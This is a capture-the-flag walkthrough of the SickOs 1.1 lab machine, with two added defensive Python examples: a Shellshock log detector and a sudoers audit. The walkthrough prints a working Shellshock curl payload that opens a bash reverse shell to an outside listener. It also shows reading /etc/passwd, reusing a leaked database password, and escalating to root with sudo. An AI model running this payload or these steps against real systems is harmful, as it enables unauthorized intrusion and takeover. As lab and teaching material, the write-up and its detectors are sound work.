SickOs 1.1


Starting with an nmap scan

-------------------------
root@kali:~# nmap -A 10.0.2.11

Starting Nmap 7.01 ( https://nmap.org ) at 2017-02-09 13:19 GMT
Nmap scan report for 10.0.2.11
Host is up (0.00036s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open http-proxy Squid http proxy 3.1.19
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:GET
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 08:00:27:75:D4:9E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms 10.0.2.11

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.57 seconds
-------------------------
I can see port 22 (SSH) and 3128, which is an HTTP proxy.

Nothing came from the SSH, so I moved on to the proxy.

I used curl through the proxy and it spat out:

-------------------------
root@kali:~# curl --proxy http://10.0.2.11:3128 10.0.2.11
<h1>
BLEHHH!!!
</h1>
-------------------------

After snooping around the site I found a page, /cgi-bin/status, and it gave out this response.

------------------------
{ "uptime": " 18:59:06 up 1:09, 0 users, load average: 0.00, 0.01, 0.05", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"}
------------------------

After finding the status page I instantly thought of using the Shellshock vuln, so I looked through my notes, had a quick refresh on it, pieced together a one-liner and hoped for the best.

-------------------------
curl -A "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/10.0.2.4/4444 0>&1' " --proxy http://10.0.2.11:3128 http://10.0.2.11/cgi-bin/status
-------------------------
Started up Netcat on port 4444 and bam, shell.

-------------------------
root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
connect to [10.0.2.12] from (UNKNOWN) [10.0.2.11] 39171
bash: no job control in this shell
www-data@SickOs:/usr/lib/cgi-bin$
-------------------------
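The Shellshock request above reaches the CGI script through the proxy, and the thing it relies on is the function-definition prefix `() {` arriving in a request header. As an added example that is not part of the original writeup, here is a Python check that scans Apache combined-format access log lines (the sample lines are constructed for this example, not taken from the box) for that prefix in the Referer and User-Agent fields and notes which of the hits were aimed at a CGI path, where the header actually gets handed to a shell:

```python
import re
from typing import Dict, List

# Constructed sample lines in Apache "combined" log format (not from the original post).
# Lines 2-4 carry the Shellshock function-definition prefix; lines 1 and 5 are normal traffic.
SAMPLE_LOG = """\
10.0.2.4 - - [09/Feb/2017:13:25:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 187 "-" "curl/7.52.1"
10.0.2.4 - - [09/Feb/2017:13:26:17 +0000] "GET /cgi-bin/status HTTP/1.1" 200 187 "-" "() { :;}; /bin/true"
10.0.2.4 - - [09/Feb/2017:13:26:40 +0000] "GET /index.php HTTP/1.1" 200 21 "() { ignored; }; /bin/true" "Mozilla/5.0"
10.0.2.4 - - [09/Feb/2017:13:27:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 187 "-" "(){:;};/bin/true"
10.0.2.4 - - [09/Feb/2017:13:27:30 +0000] "GET /robots.txt HTTP/1.1" 404 209 "-" "Mozilla/5.0 (X11; Linux)"
"""

# Apache combined format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# An empty function definition followed by an opening brace: the shape vulnerable bash
# versions parsed out of environment variables. Whitespace between the tokens is optional.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


def find_shellshock_attempts(log_text: str) -> List[Dict[str, object]]:
    """Return one finding per log field that carries the Shellshock prefix."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not a combined-format line; a real job would count these
        parts = m.group("req").split()
        path = parts[1] if len(parts) > 1 else ""
        for field in ("referer", "ua"):
            value = m.group(field)
            if SHELLSHOCK_RE.search(value):
                findings.append({
                    "line": lineno,
                    "ip": m.group("ip"),
                    "request": m.group("req"),
                    "field": field,
                    "value": value,
                    # Only a CGI target hands the header to a shell; elsewhere it is noise/probing.
                    "cgi": path.startswith("/cgi-bin/"),
                })
    return findings


if __name__ == "__main__":
    for f in find_shellshock_attempts(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} {f['request']!r} in {f['field']}"
              f" (cgi={f['cgi']}): {f['value']!r}")
```

The combined format only records two request headers, so the same prefix sent in Cookie or Host would not show up here; a full-header audit log such as mod_security's is needed for that. Squid's default native access log format does not record the User-Agent either, so on a setup like this the web server's own log, not the proxy's, is where the attempt becomes visible.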

I was running as the www-data user, and now that I've got initial access my next goal is to get root.

I started to dig around and checked the /etc/passwd file, and found the sickos user interesting as it's not a default user and obviously it's the name of the challenge.

--------------------------
www-data@SickOs:/var/www/wolfcms/wolf$ cat /etc/passwd | grep sickos
cat /etc/passwd | grep sickos
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
--------------------------

With the user I want to get to in mind, I started to roam the server. I checked /var/www and came across a config.php.

I opened it and found this inside:

---------------------------
// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');
----------------------------

I tried logging on to the sickos user and realised I missed a crucial step.

----------------------------
www-data@SickOs:/usr/lib/cgi-bin$ su sickos
su sickos
su: must be run from a terminal
www-data@SickOs:/usr/lib/cgi-bin$
----------------------------

So I spawned a shell and continued with logging in to the sickos user.

----------------------------
python -c 'import pty; pty.spawn("/bin/bash")'
----------------------------

Take 2
---------------------------
www-data@SickOs:/usr/lib/cgi-bin$ su sickos
su sickos
Password: john@123

sickos@SickOs:/usr/lib/cgi-bin$
----------------------------

After logging in I found it was running with root level privileges.

As our user is running at root level, we can simply log in to root without a password.

---------------------------
sudo su
---------------------------

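Whether an account can reach root through sudo, and whether sudo prompts for a password first, is decided by the user specifications in /etc/sudoers. As an added example that is not from the original writeup, this Python audit parses a constructed sudoers file (the rules in it are made up for the example, not copied from the box) and lists which accounts can run anything as root, and which of those can do it with the NOPASSWD tag, i.e. with no password prompt at all. It handles backslash continuations and the sudoers rule that a tag stays in effect for the rest of a comma-separated command list:

```python
import re
from typing import Dict, Iterator, List

# Constructed /etc/sudoers contents for this example (not taken from the box).
SAMPLE_SUDOERS = """\
# /etc/sudoers -- constructed sample
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification
Host_Alias      WEB = 10.0.2.11

root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
sickos  ALL=(ALL) NOPASSWD: ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, \\
        /usr/bin/tar
#includedir /etc/sudoers.d
"""

TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|"
                    r"LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW)\s*:\s*")
# user  host = (runas) [tags:] command, command ...
SPEC_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?P<rest>.+)$")
RUNAS_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")


def logical_lines(text: str) -> Iterator[str]:
    """Join backslash-continued lines and drop blanks and comments."""
    buf = ""
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        logical = buf.strip()
        buf = ""
        # '#include'/'#includedir' are directives; this audit does not follow them.
        if logical and not logical.startswith("#"):
            yield logical


def parse_sudoers(text: str) -> List[Dict[str, str]]:
    """Return one record per (user, command) pair found in the user specifications."""
    records: List[Dict[str, str]] = []
    for line in logical_lines(text):
        if line.startswith(SKIP_PREFIXES):
            continue  # aliases are not expanded here; a full audit would resolve them
        spec = SPEC_RE.match(line)
        if not spec:
            continue
        rest = spec.group("rest")
        runas = "root"  # sudoers default when no (runas) list is given
        m = RUNAS_RE.match(rest)
        if m:
            runas = m.group("runas")
            rest = rest[m.end():]
        tags = set()  # a tag applies to every following command in the list until changed
        for item in rest.split(","):
            item = item.strip()
            while True:
                t = TAG_RE.match(item)
                if not t:
                    break
                tag = t.group(1)
                if tag == "NOPASSWD":
                    tags.discard("PASSWD")
                elif tag == "PASSWD":
                    tags.discard("NOPASSWD")
                tags.add(tag)
                item = item[t.end():]
            records.append({"who": spec.group("who"), "host": spec.group("host"),
                            "runas": runas, "tags": ",".join(sorted(tags)), "command": item})
    return records


def full_root(records: List[Dict[str, str]]) -> List[str]:
    """Accounts/groups allowed to run any command as root (or as anyone)."""
    return sorted({r["who"] for r in records
                   if r["command"] == "ALL" and r["runas"].split(":")[0] in ("ALL", "root")})


def passwordless_root(records: List[Dict[str, str]]) -> List[str]:
    """Subset of full_root() that sudo will never ask a password for."""
    return sorted({r["who"] for r in records
                   if r["command"] == "ALL" and "NOPASSWD" in r["tags"].split(",")
                   and r["runas"].split(":")[0] in ("ALL", "root")})


if __name__ == "__main__":
    recs = parse_sudoers(SAMPLE_SUDOERS)
    print("can run anything as root:", full_root(recs))
    print("... without a password:  ", passwordless_root(recs))
```

On a live system the same functions can be pointed at `sudo -l` output or at the files under /etc/sudoers.d once the include directives are followed; any non-root entry turning up in `passwordless_root()` means a shell as that account is effectively a root shell, which is exactly the jump the writeup makes from sickos to root.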
I looked in the root directory and found a txt file, so I opened it and finished the CTF!!!!

Really enjoyed the CTF. Bit strange that WolfCMS wasn't a part of it, maybe there's another way in.